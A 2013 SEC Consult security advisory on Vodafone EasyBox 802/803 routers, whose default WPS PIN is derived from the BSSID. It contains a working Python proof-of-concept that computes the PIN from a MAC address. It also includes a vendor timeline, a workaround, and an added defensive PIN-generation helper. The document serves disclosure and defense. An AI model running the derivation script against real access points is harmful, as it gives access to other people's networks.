Vodafone EasyBox Default WPS PIN Algorithm Weakness

Posted Aug 6, 2013
Authored by S. Viehbock | Site sec-consult.com

Vodafone EasyBox versions 802 and 803 suffer from a default WPS PIN algorithm weakness. The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address.

tags | exploit
SHA-256 | 289f3c58cfede8c1346e1a846dc8ad72e079b2ff4985c9f67e119e67dffb4df5

SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >
=======================================================================
title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 & EasyBox 803
vulnerable version: EasyBox 802 - all versions
EasyBox 803 - Production date before August 2011
fixed version: EasyBox 802 - no vendor patch available
EasyBox 803 - Production date after August 2011
impact: Critical
homepage: http://www.vodafone.de
found: 2012-12-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.


Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS-PIN is entirely based on the MAC
address (=BSSID) and serial number of the device. The serial number can be
derived from the MAC address.

An unauthenticated attacker within range of the access point can capture
the BSSID (e.g. from 802.11 beacon frames) and calculate the default WPS PIN
for it. This PIN can then be used to retrieve the current access point
configuration (including the WPA passphrase) or to change the configuration
(SSID, encryption method, passphrase, ...) of the access point.

An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.


Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:

#!/usr/bin/env python3
import sys
import re


def gen_pin(mac_str, sn):
    # Split the 12 hex digits of the BSSID and the digits of the serial number
    mac_int = [int(x, 16) for x in mac_str]
    sn_int = [0] * 5 + [int(x) for x in sn[5:]]
    hpin = [0] * 7

    k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
    k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
    hpin[0] = k1 ^ sn_int[9]
    hpin[1] = k1 ^ sn_int[8]
    hpin[2] = k2 ^ mac_int[9]
    hpin[3] = k2 ^ mac_int[10]
    hpin[4] = mac_int[10] ^ sn_int[9]
    hpin[5] = mac_int[11] ^ sn_int[8]
    hpin[6] = k1 ^ sn_int[7]
    pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5],
                                         hpin[6]), 16) % 10000000

    # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
    # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
    accum = 0
    t = pin
    while t:
        accum += 3 * (t % 10)
        t //= 10
        accum += t % 10
        t //= 10
    return '%i%i' % (pin, (10 - accum % 10) % 10)


def main():
    if len(sys.argv) != 2:
        sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')

    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')

    # The last five digits of the serial number are derived from the low 16 bits of the MAC
    sn = 'R----%05i' % int(mac_str[8:12], 16)
    print('derived serial number:', sn)
    print('SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8],
                                                         mac_str[9], sn[5], sn[9]))
    print('WPS pin:', gen_pin(mac_str, sn))


if __name__ == "__main__":
    main()


Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.

According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011


Vendor contact timeline:
------------------------
2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datenschutz@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted
channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com
and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives
information about some newer devices which are not affected,
mentions that customers have already been notified to change
"default passwords" (no details given).
2013-02-21: Requesting information regarding affected products/product versions,
clarification regarding "default passwords", URLs/communication
channels used for mentioned notifications, ways for identifying
vulnerable devices (end users), ...
2013-03-13: Still no response - sending deadline dates
2013-05-29: Contacting German CERT-Bund for further coordination in order to
warn end users
2013-08-05: Coordinated release of advisory with German CERT-Bund


Solution:
---------
Vodafone does not provide a solution for the affected devices.


Workaround:
-----------
Either change the WPS PIN or disable WPS entirely.
SEC Consult could not confirm if WPS actually is disabled (as opposed to just
not being advertised), so both changing the PIN and disabling WPS is
recommended.
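A helper for the workaround above, added here as an example; it is not part of the advisory or its proof of concept. It implements the WSC check-digit rule the proof of concept points to (the same arithmetic as hostapd's wps_pin_checksum), validates any 8-digit WPS PIN against it, and generates a replacement PIN from the operating system's CSPRNG, so the new PIN is well-formed and has no relation to the BSSID or serial number. The function names are my own.

```python
import secrets


def wps_pin_checksum(first7):
    """Return the check digit for the first seven digits of a WPS PIN.

    Same weighting as hostapd/wpa_supplicant wps_pin_checksum(): digits at
    odd positions (from the right) are weighted 3, even positions 1.
    """
    accum = 0
    t = first7
    while t:
        accum += 3 * (t % 10)
        t //= 10
        accum += t % 10
        t //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin):
    """True if pin is an 8-digit string whose last digit is the WSC checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def random_wps_pin():
    """Generate a fresh, checksum-correct 8-digit WPS PIN from os-level randomness."""
    body = secrets.randbelow(10_000_000)        # 0 .. 9999999, uniformly
    return "%07d%d" % (body, wps_pin_checksum(body))


def check_replacement(old_pin, new_pin):
    """Report whether new_pin is usable as a replacement for old_pin.

    Returns (ok, reason). The only knowledge about the old PIN used here is its
    value, so the caller can pass the PIN printed on the device label.
    """
    if not is_valid_wps_pin(new_pin):
        return False, "new PIN fails the WSC checksum; most registrars reject it"
    if new_pin == old_pin:
        return False, "new PIN equals the factory default"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: 12345670 is the well-known checksum-valid test PIN
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    candidate = random_wps_pin()
    print("replacement PIN:", candidate, check_replacement("12345670", candidate))
```

Changing the PIN is only one half of the recommendation above; since the advisory could not confirm that the EasyBox really stops answering WPS when it is hidden from beacons, disabling WPS in the web interface should be done in addition to setting a random PIN.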


Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2013